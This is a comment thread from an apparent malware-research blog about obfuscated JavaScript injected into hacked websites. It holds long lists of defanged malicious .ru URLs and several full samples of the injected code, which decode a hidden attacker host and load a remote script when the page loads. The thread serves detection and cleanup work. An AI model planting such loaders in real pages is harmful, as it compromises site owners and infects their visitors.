    hxxp://mlb-com.heise.de.tiscali-it.thechocolateweb.ru:8080/adult-empire.com/adult-empire.com/ig.com.br/google.com/badjojo.com/
    hxxp://mobile9-com.cctv.com.pcworld-com.webnetenglish.ru:8080/ziddu.com/ziddu.com/virginmedia.com/vmn.net/google.com/
    hxxp://monster-com.experts-exchange.com.secureserver-net.xboxliveweb.ru:8080/6.cn/6.cn/linksynergy.com/playstation.com/google.com/
    hxxp://orbitdownloader-com.interia.pl.taobao-com.manbest.ru:8080/fbcdn.net/fbcdn.net/google.com/mcssl.com/ninemsn.com.au/
    hxxp://orbitz-com.yaplog.jp.tube8-com.webdesktopnet.ru:8080/google.com/google.com/dell.com/myfreepaysite.com/orkut.com/
    hxxp://orkut-com-br.hattrick.org.wiktionary-org.webnetenglish.ru:8080/google.com/google.com/intel.com/vnet.cn/onlinedown.net/
    hxxp://petardas-com.sitepoint.com.yomiuri-co-jp.carswebnet.ru:8080/realitykings.com/realitykings.com/4shared.com/google.com/ifeng.com/
    hxxp://playstation-com.mercadolibre.com.ar.ganji-com.thelaceweb.ru:8080/wp.pl/wp.pl/uwants.com/google.com/tuenti.com/
    hxxp://rapid4me-com.bangbros1.com.perezhilton-com.weblessnet.ru:8080/linkwithin.com/linkwithin.com/digg.com/google.com/google.com.vn/
    hxxp://retailmenot-com.buy.com.gamefaqs-com.thechocolateweb.ru:8080/espn.go.com/espn.go.com/google.com.hk/google.com/ggpht.com/
    hxxp://retailmenot-com.uol.com.br.m-w-com.webdesktopnet.ru:8080/ziddu.com/ziddu.com/wp.pl/google.com/360.cn/
    hxxp://reverso-net.reddit.com.hotlinkimage-com.worldwebworld.ru:8080/google.com/google.com/seriesyonkis.com/travian.com/mozilla.com/
    hxxp://rottentomatoes-com.google.com.gazzetta-it.thelaceweb.ru:8080/google.com/google.com/dion.ne.jp/anonym.to/playstation.com/
    hxxp://rr-com.zappos.com.jcpenney-com.thechocolateweb.ru:8080/google.com/google.com/wellsfargo.com/tudou.com/msn.com.cn/
    hxxp://seznam-cz.hsbc.co.uk.kakaku-com.webnetenglish.ru:8080/google.com/google.com/marca.com/allabout.co.jp/iza.ne.jp/
    hxxp://sitesell-com.symantec.com.ganji-com.thechocolateweb.ru:8080/google.com/google.com/echoroukonline.com/mop.com/clickbank.com/
    hxxp://sogou-com.gamevance.com.mozilla-com.thechocolateweb.ru:8080/mtime.com/mtime.com/google.com/realitykings.com/nasa.gov/
    hxxp://southwest-com.mapquest.com.secureserver-net.guidebat.ru:8080/tigerdirect.com/tigerdirect.com/google.com/uploading.com/yaplog.jp/
    hxxp://sponsorads-de.onemanga.com.tiscali-it.thechocolateweb.ru:8080/kaixin.com/kaixin.com/icbc.com.cn/google.com/aol.com/
    hxxp://staples-com.jeuxvideo.com.passport-net.thelaceweb.ru:8080/eastmoney.com/eastmoney.com/google.pt/google.com/justin.tv/
    hxxp://stern-de.linkhelper.cn.wikipedia-org.carswebnet.ru:8080/irctc.co.in/irctc.co.in/yaplog.jp/ovguide.com/google.com/
    hxxp://sun-com.yahoo.com.neobux-com.xboxliveweb.ru:8080/y8.com/y8.com/google.com/skycn.com/wer-kennt-wen.de/
    hxxp://t-mobile-com.howstuffworks.com.brazzers-com.carswebnet.ru:8080/google.com/google.com/avast.com/gap.com/traidnt.net/
    hxxp://thesun-co-uk.brothersoft.com.usatoday-com.sugaryhome.ru:8080/kino.to/kino.to/google.com/slutload.com/seriesyonkis.com/
    hxxp://travelocity-com.google.co.za.vnexpress-net.xboxliveweb.ru:8080/google.com/google.com/robtex.com/slickdeals.net/fc2.com/
    hxxp://tudou-com.ifolder.ru.adsrevenue-net.worldwebworld.ru:8080/woot.com/woot.com/dtiblog.com/google.com/answers.com/
    hxxp://univision-com.king.com.toysrus-com.carswebnet.ru:8080/monografias.com/monografias.com/google.com/ultimate-guitar.com/iciba.com/
    hxxp://verizon-net.baidu.com.bahn-de.webdesktopnet.ru:8080/google.com/google.com/tnaflix.com/mtime.com/google.com.tw/
    hxxp://watch-movies-online-tv.nate.com.technorati-com.thelaceweb.ru:8080/torrentreactor.net/torrentreactor.net/google.com/picfoco.com/chinaz.com/
    hxxp://wellsfargo-com.w3.org.it168-com.thechocolateweb.ru:8080/360buy.com/360buy.com/google.com/wiktionary.org/51yes.com/
    hxxp://wellsfargo-com.yandex.ua.freshwap-net.webnetenglish.ru:8080/letitbit.net/letitbit.net/toysrus.com/daqi.com/google.com/
    hxxp://wiktionary-org.ameba.jp.freeones-com.thelaceweb.ru:8080/bu520.com/bu520.com/businessweek.com/scribd.com/google.com/
    hxxp://xici-net.infoseek.co.jp.wellsfargo-com.thelaceweb.ru:8080/google.com/google.com/sponichi.co.jp/megaclick.com/ipicture.ru/
    hxxp://zappos-com.blackhatworld.com.dailymail-co-uk.thechocolateweb.ru:8080/acer.com/acer.com/google.com/vnexpress.net/petardas.com/

  20. |

    Hello, this is great information. May I ask how you find out the hidden iframe link from the src attribute?

  21. |

    hxxp://amazon-co-uk.skyrock.com.about-com.webnetenglish.ru:8080/google.com/google.com/foxsports.com/gc.ca/dell.com/
    hxxp://boston-com.symantec.com.cocolog-nifty-com.worldwebworld.ru:8080/msn.ca/msn.ca/iwiw.hu/google.com/yoka.com/
    hxxp://ebay-fr.blackhatworld.com.webmd-com.webnetenglish.ru:8080/hi5.com/hi5.com/google.com/windowslive.com/tomshardware.com/
    hxxp://google-cl.badoo.com.tinypic-com.carswebnet.ru:8080/google.co.za/google.co.za/bebo.com/google.com/cbssports.com/
    hxxp://hc360-com.webmasterworld.com.ning-com.worldwebworld.ru:8080/beemp3.com/beemp3.com/55bbs.com/xe.com/google.com/
    hxxp://microsoft-com.ning.com.megaupload-com.carswebnet.ru:8080/badoo.com/badoo.com/mobile.de/google.com/fishki.net/
    hxxp://mlb-com.heise.de.tiscali-it.thechocolateweb.ru:8080/adult-empire.com/adult-empire.com/ig.com.br/google.com/badjojo.com/
    hxxp://orkut-com-br.hattrick.org.wiktionary-org.webnetenglish.ru:8080/google.com/google.com/intel.com/vnet.cn/onlinedown.net/
    hxxp://sfgate-com.meetup.com.aol-com.worldwebworld.ru:8080/miniclip.com/miniclip.com/xbox.com/google.com/google.it/
    hxxp://veoh-com.wunderground.com.ifeng-com.worldwebworld.ru:8080/ovh.net/ovh.net/zaycev.net/google.com/orf.at/

  22. |

    hxxp://amazon-fr.skype.com.ya-ru.thelaceweb.ru:8080/39.net/39.net/google.com/gc.ca/rk.com/
    hxxp://detiknews-com.pchome.net.novinky-cz.webdesktopnet.ru:8080/windowslive.com/windowslive.com/shopping.com/bing.com/google.com/
    hxxp://digg-com.uwants.com.livescore-com.whosaleonline.ru:8080/sciencedirect.com/sciencedirect.com/google.com.hk/google.com/infolinks.com/
    hxxp://docstoc-com.zappos.com.realitykings-com.webdesktopnet.ru:8080/pch.com/pch.com/comcast.net/google.com/hi5.com/
    hxxp://ebay-de.adserverplus.com.sify-com.thelaceweb.ru:8080/in.com/in.com/zedo.com/sweetim.com/google.com/
    hxxp://en-wordpress-com.staples.com.multiupload-com.webnetenglish.ru:8080/eastmoney.com/eastmoney.com/google.com/robtex.com/abc.go.com/
    hxxp://facebook-com.mixi.jp.wareseeker-com.usaworldwideweb.ru:8080/google.co.ma/google.co.ma/110mb.com/gougou.com/google.com/
    hxxp://free-fr.rapidshare.com.hotlinkimage-com.thechocolateweb.ru:8080/51job.com/51job.com/redtube.com/gittigidiyor.com/google.com/
    hxxp://gizmodo-com.ovh.net.download-com.thelaceweb.ru:8080/theplanet.com/theplanet.com/fedex.com/google.com/go.com/
    hxxp://iza-ne-jp.persianblog.ir.seriesyonkis-com.webnetenglish.ru:8080/google.com/google.com/yallakora.com/sabah.com.tr/orange.fr/
    hxxp://marketwatch-com.atdmt.com.craigslist-ca.thelaceweb.ru:8080/lemonde.fr/lemonde.fr/pixnet.net/google.com/elmundo.es/
    hxxp://meinvz-net.mihanblog.com.verizonwireless-com.thelaceweb.ru:8080/capitalone.com/capitalone.com/booking.com/google.com/bizrate.com/
    hxxp://metrolyrics-com.google.co.in.google-co-th.thechocolateweb.ru:8080/ucoz.ru/ucoz.ru/sohu.com/freelotto.com/google.com/
    hxxp://miibeian-gov-cn.amazon.fr.ticketmaster-com.webdesktopnet.ru:8080/pichunter.com/pichunter.com/google.com/pch.com/uploaded.to/
    hxxp://mixx-com.kinopoisk.ru.gmodules-com.worldwebworld.ru:8080/sulekha.com/sulekha.com/mihanblog.com/google.com/stumbleupon.com/
    hxxp://mybrowserbar-com.samsung.com.nasa-gov.egreatsale.ru:8080/megavideo.com/megavideo.com/laredoute.fr/bild.de/google.com/
    hxxp://naqigs-com.dmm.co.jp.reddit-com.worldwebworld.ru:8080/google.com/google.com/thefreedictionary.com/megavideo.com/plentyoffish.com/
    hxxp://nih-gov.miibeian.gov.cn.craigslist-ca.sugaryhome.ru:8080/cyworld.com/cyworld.com/archive.org/google.com/comdirect.de/
    hxxp://onemanga-com.ticketmaster.com.plala-or-jp.worldwebworld.ru:8080/classmates.com/classmates.com/boston.com/google.com/huanqiu.com/
    hxxp://orange-fr.tudou.com.youtube-com.webnetenglish.ru:8080/pichunter.com/pichunter.com/google.com/marketwatch.com/forumcommunity.net/
    hxxp://pornhub-com.perezhilton.com.goo-ne-jp.thechocolateweb.ru:8080/google.com/google.com/bangbros1.com/sponichi.co.jp/onet.pl/
    hxxp://rakuten-ne-jp.overstock.com.pixnet-net.thelaceweb.ru:8080/mercadolibre.com.ar/mercadolibre.com.ar/partypoker.com/google.com/linezing.com/
    hxxp://rincondelvago-com.tabnak.ir.hyves-nl.webnetenglish.ru:8080/squidoo.com/squidoo.com/google.com/orbitdownloader.com/news.com.au/
    hxxp://rivals-com.tagged.com.dreamstime-com.thelaceweb.ru:8080/google.com/google.com/slutload.com/match.com/alibaba.com/
    hxxp://sakura-ne-jp.nasa.gov.39-net.webdesktopnet.ru:8080/ca.gov/ca.gov/google.com/songs.pk/echoroukonline.com/
    hxxp://shaadi-com.free.fr.stc-com-sa.funwebmail.ru:8080/libero.it/libero.it/msn.ca/orkut.com/google.com/
    hxxp://soso-com.linkwithin.com.360-cn.worldwebworld.ru:8080/cmbchina.com/cmbchina.com/google.com/cams.com/zol.com.cn/
    hxxp://vnexpress-net.9wee.com.perezhilton-com.worldwebworld.ru:8080/google.com/google.com/radikal.ru/ynet.com/hotfile.com/
    hxxp://who-is.yomiuri.co.jp.archive-org.thelaceweb.ru:8080/allyes.com/allyes.com/adultfriendfinder.com/liveinternet.ru/google.com/
    hxxp://wikipedia-org.smashingmagazine.com.foodnetwork-com.easytabletennis.ru:8080/19lou.com/19lou.com/google.com/zappos.com/avast.com/
    hxxp://wrzuta-pl.besttubeclips.com.jrj-com-cn.funwebmail.ru:8080/seesaa.net/seesaa.net/google.com/fixya.com/virginmedia.com/

  23. |

    Hey,

    I wanted to know how did you deobfuscate the script?
    I tried with malzila but it didn’t do it, maybe i did something wrong.

    • |

      THe scripts are very lightly obfuscated. I just check the value assigned to the “src” parameter.

      If you tried to deobfuscate the script in this article, note that I slightly garbled it to make harmless.

  24. |

    hxxp://adbrite-com.1e100.net.petardas-com.carswebnet.ru:8080/google.sk/google.sk/basecamphq.com/google.com/accuweather.com/
    hxxp://amazon-de.kinopoisk.ru.marketwatch-com.thechocolateweb.ru:8080/google.com/google.com/ebay.fr/mysql.com/foxnews.com/
    hxxp://bild-de.zedge.net.qip-ru.thelaceweb.ru:8080/tabelog.com/tabelog.com/repubblica.it/cnet.com/google.com/
    hxxp://clicksor-com.eastmoney.com.mobile-de.homesaleplus.ru:8080/ocn.ne.jp/ocn.ne.jp/classmates.com/linkhelper.cn/google.com/
    hxxp://cnzz-com.play.com.detik-com.thechocolateweb.ru:8080/babylon.com/babylon.com/google.com/reddit.com/ninemsn.com.au/
    hxxp://doctissimo-fr.news.com.au.accuweather-com.worldwebworld.ru:8080/google.com/google.com/persianblog.ir/xunlei.com/zappos.com/
    hxxp://hoopchina-com.it168.com.drudgereport-com.thechocolateweb.ru:8080/xvideos.com/xvideos.com/google.com/laredoute.fr/orbitz.com/
    hxxp://ibm-com.lowes.com.wowarmory-com.worldwebworld.ru:8080/pantip.com/pantip.com/google.com/intel.com/dantri.com.vn/
    hxxp://irctc-co-in.rapidshare.com.skyrock-com.thechocolateweb.ru:8080/brazzers.com/brazzers.com/photobucket.com/ovguide.com/google.com/
    hxxp://linezing-com.thepiratebay.org.gazeta-pl.thechocolateweb.ru:8080/novinky.cz/novinky.cz/empflix.com/narod.ru/google.com/
    hxxp://nowdownloadall-com.costco.com.travelocity-com.thelaceweb.ru:8080/aol.com/aol.com/pconline.com.cn/google.com/rian.ru/
    hxxp://radikal-ru.nydailynews.com.tianya-cn.greatwebradio.ru:8080/break.com/break.com/google.com.ec/google.com/novoteka.ru/
    hxxp://softlayer-com.capitalone.com.google-co-th.viewhomesale.ru:8080/conduit.com/conduit.com/passport.net/google.com/att.com/
    hxxp://sponsorads-de.58.com.abc-go-com.thelaceweb.ru:8080/google.com/google.com/informer.com/fling.com/addictinggames.com/
    hxxp://webs-com.gutefrage.net.bigpoint-com.worldwebworld.ru:8080/w3.org/w3.org/google.com/freewebs.com/priceminister.com/
    hxxp://wer-kennt-wen-de.google.pt.match-com.worldwebworld.ru:8080/imeem.com/imeem.com/google.com/cam4.com/google.com.ua/
    hxxp://woot-com.xbox.com.orkut-co-in.thechocolateweb.ru:8080/google.co.ma/google.co.ma/google.com/rapid4me.com/samsung.com/
    hxxp://wrzuta-pl.y8.com.alot-com.worldwebworld.ru:8080/taobao.com/taobao.com/google.com/marktplaats.nl/ovguide.com/
    hxxp://xcar-com-cn.37wan.com.58-com.webnetenglish.ru:8080/msn.ca/msn.ca/dailymotion.com/google.com/letitbit.net/

    • |

      Thanks.

      I guess it is enough full URLs. It makes sense to only post new .ru domains here: e.g.
      webnetenglish .ru
      thechocolateweb .ru
      etc.

  25. |

    I was just wondering how you got this link easytabletennis .ru from the javascript, but now I understand the src attribute just had other special characters to hide the link. thanks!

  26. |

    [...] From Hidden Iframes to Obfuscated Scripts | Unmask Parasites. Blog. [...]

  27. |

    [...] http://blog.unmaskparasites.com/2009/12/23/from-hidden-iframes-to-obfuscated-scripts/ [...]

  28. |

    Code changed two times already last night. Sample as follows:
    —snip—
    /*Exception*/ document.write(”);

    —snap—

    Have posted full URLs over at malwaredomainlist.

    Cheers,
    micha

  29. |

    Whoops, that didn’t quite work. Another try without certain special chars:
    script /*Exception*/ document.write( script src= + h&##&x#!(x()p$^&:(/&!/@(s#(#)e((^#a)!&^r@&s^&!-((c(#o^@&m^$@.^)(m(@&o$)^p)()#.@@c)&o@&m@#.!^k$##a$@@@i^@!)x!^#i^n^)@@!-$c!^@&o$&m!^).#&)g)^^^e$@@n(&^$u$#i#(n@e#c#$o#&l^!^o!!r&^^@&s#&$.@r$(#^u##&!:&!(8#$0(^8$&0$$/@&(i!(c(!)i!!!o(^^.#)!u##)(s!&)/)@@i$(c$$$^i^^o(^#.@&u$!s^)/@&!w&!$h!o()(.@#&i$!@@s)/^!(s^(z)#@#n$!.)$@c(#z$)#^/#g)&o(o&#g!l)e^(!.$!)c)(o(^!m!)&/^&@) .replace(/#|@|&|\)|\!|\^|\(|\$/ig, )+ defer=defer /scr + ipt ); /script
    !–ac9d81dd3e188c20195d91ac83ea09ef–

    • |

      A client just reported the same thing this morning as well. The domain in use was:
      hxxp://photobucket-com.sanspo.com.yoka-com.truelifefamily. ru:8080/118114.cn/118114.cn/google.com/allocine.fr/allabout.co.jp/

  30. |

    The script has a new revision already out and being injected into sites. A sample:

     try{window.onload=function(){document.write('<div id=megaid>skysports-com.marketwatch</div>');Whglbtpkg9yawk = document.getElementById('megaid').innerHTML + '.)c^o#$$#m@(@.&&(!t&o(&&r##&&r!($#e#@!n@t!s!)-@(r(u@$^.$$&y)!!o&!u#!!r##!t!&@!o@($&p!@(&f$@i^l$m)^!@s(.())r!#(&u!)@:&!&#)D)E)&#&B)()U^&(@G&@(@/#(^c((a!m)##)$4#@@.#&^c####&o(#!m)/@^c$&a^)@m(4&#.!@)(^c($o@m!&!/(g)!!o&&#$o!g&(l&)^^e&#@.&^c#(o^&m!^$/(#m!^^c(&s$s@)l!^$.^&$c(($o#(@m)(/@!&g@#o&!!$@o$##g$@#l$e&&).#$c^#o$#!m#&)$.)(#e&&)^g)&/&'.replace(/&|#|\$|\)|\!|\(|\^|@/ig, '') ;document.write('<scr'+'ipt src=http://'+Whglbtpkg9yawk.replace(/DEBUG/g, '8080')+'></scr'+'ipt>');} }  catch(Xvp1q8pu ) {}
    <!--50e1dd63239a5e1b3900972f2e5de214--> 

    • |

      I have just updated the Sophos detection for Troj/JSRedir-AK for this variant.
      These guys are morphing the code more regularly than they used to.

  31. |

    [...] This post was mentioned on Twitter by Denis, Julio Canto, Masafumi Negishi, Tatsuya Daitoku, Yoshi Tachibana and others. Yoshi Tachibana said: 27日あたりから出てきましたね… RT @ymzkei5 ぐふっ。 RT @MasafumiNegishi: RT @unmaskparasites: New revision of the "GNU GPL" script http://bit.ly/aXWbZ6 [...]

  32. |

    I had a similar problem, couldn’t find the exact code. After replacing my swfobject.js file with an updated version, this resolved the issue. Seems like it is infecting js files.

  33. |

    Hi, Thank you. We didn’t know about this. We were hit three times in the last two weeks. The URL they used on our site yesterday:
    fbcdn-net.yallakora.com.google-co-in.counterbest .ru:8080/google.com/google.com/warez-bb.org/china.com/bit.ly/

  34. |

    Revised yet again, most recent sample:

    try{window.onload=function(){document.write(‘<div id=Fuq9970c1s5ie8>drudgereport-com.chinamob</div>’);Jzzicgcp586y245 = document.getElementById(‘Fuq9970c1s5ie8′).innerHTML + ’i)^l(e@&&.$c!&#o#m)#&!.($&^w#s$j$$)-@c^!#@o$(m(@@.$!&w()!a$^$!v(&$e!(@b&)&a&@!&^n$#k$$^.@r!)(u!#^:)()O(&o!s$#&)@s^t)!#u$$))q!^u$!&o()#y$@^v&x)@^)/#&#^h@$(o&#^$m)e@!w##&a^)y(&!.!!c^o@m@)($.$$&@#c&&@n$^!/&$(h!@o$&m)^(@e#!^#w##a#!!^y@.!!$c#)@@!o$(m()^.^c#&!^n!^#/)(&(g(!o&o@#g#l((!e)^))^.$c^o!#$$m$/##(c#!#@a#$r^(&$e!#e$!&$r@b@#$u$()!i^&^l!(d$)!@e$r!^&.@(#c&(@&#o!m#!(@/))w($&o)$w&)^a^$#r$&!m&@o#)r@y(^.&^(c&)^!o($&m&@!^/(^’.replace(/\$|\(|@|\^|\)|#|\!|&/ig, ”) ;document.write(‘<scr’+'ipt src=h’+'ttp://’+Jzzicgcp586y245.replace(/Oosstuquoyvx/ g, ”8080″)+’></scr’+'ipt>’);} } catch(Tjkclo5m ) {}

    <!–908fc049c965bc03ac9c678ea1cd685f–>

    • |

      As more of a explanatory note. The main difference between this and the previous version is the randomization of the “megaid” div id. Presumably to prevent this from being used as a signature.

    • |

      This must be yet another revision

      try{window.onload=function(){Iebf2d21q07z = '' + 'i)c(#i$b)!a&$-$(c$())o&)m((.@c&)!o&(@n(&s!)(t@!#a)n@!!t(@&(@c^$^#o^#n&t!a&&c!t(.!#(c(&@^o))$^m#&&.@&p@e@)^r&e#@)$z@h#(i!l!#^t((@o@n!@@^-#$^c)^(o(&m).#(b^i)$l&$(&!t$o^&!p^&.@&#&r!(u$:@))N#q#@5#(^b!(&@h$3)f&@)i#@t&$w&!1@r$#v!$/!&@$g####o($@&&o(g$l)@!e@$.@(c$$()o&m&.$@(a^u!/^##g))()o#^o#&#g$#l!^)e$$.&#c!o($@m($.!^^a!u)^!/@!t#$@o(($r(!#r&(&e#^n$t^@^$s!&$^.(@r#!@u)$#&/(a@$l$#l!(e!^g$)(r&$#)o$^&.^p()l!)^@/#$$##g#$o)@$o)$#^g(&l(e@.#!c&o&@m$#/^'.replace(/#|@|\^|\$|\!|&|\)|\(/ig, '') ;
      Jq2dz9nff1w0lm = 'appendChild';Rkn5tmljhj1c = d ocument.createElement('sc'+'ript');
      Rkn5tmljhj1c.src = 'h'+'ttp://'+Iebf2d21q07z.replace(/Nq5bh3fitw1rv/ g, "8080");Rkn5tmljhj1c.setAttribute('defer', 'def'+'er');e val('document.body.'+Jq2dz9nff1w0lm+'(Rkn5tmljhj1c)');} } catch(P052l4jn ) {}

      in this case translates to
      iciba-com.constantcontact.com.perezhilton-com.biltop .ru:8080/google.com.au/google.com.au/torrents.ru/allegro.pl/google.com/

  35. |

    May I ask what happens when I click on a hyperlink in a SPAM that sends me to one of these posted malware sites? Specifically,I have traced the IP’s listed in the SPAM and it seems that the redirecting thru infected PCS and hosts ends up at an online drugstore.One of them is Luxpharmacy .com

  36. |

    My website also had this, the URL that I had was hxxp://picfoco-com.capitalone.com.salesforce-com.theantimatrix .ru:8080/google.com/google.com/vmn.net/netlog.com/over-blog.com

    Can somebody let me know whats the harm that this code would have done? Appreciate your response.

    Cheers
    Anand

  37. |

    Looks like a possible evolution of this one. The injected code is here: http://noxwizard.pastebin.com/f6e4b85cc
    Of course it’s on two lines and not the way I have it. Ultimately what happens is that HS() gets called on line 578, which at this point is the following function: http://noxwizard.pastebin.com/f26805767

    • |

      I forgot to mention that I was able to verify through the logs that the FTP credentials had been stolen.

    • |

      I have been seeing a lot of this most recent variation. It is being randomized on each injection. However the injection is consistent across the account, and the structure stays similar.

  38. |

    [...] over at Unmask Parasites. Blog. they also noticed this [...]

  39. |

    [...] one of the main methods for infection is via compromised FTP credentials. My colleague over at the Unmask Parasites. Blog has also reported seeing large numbers of sites affected. Affected websites [...]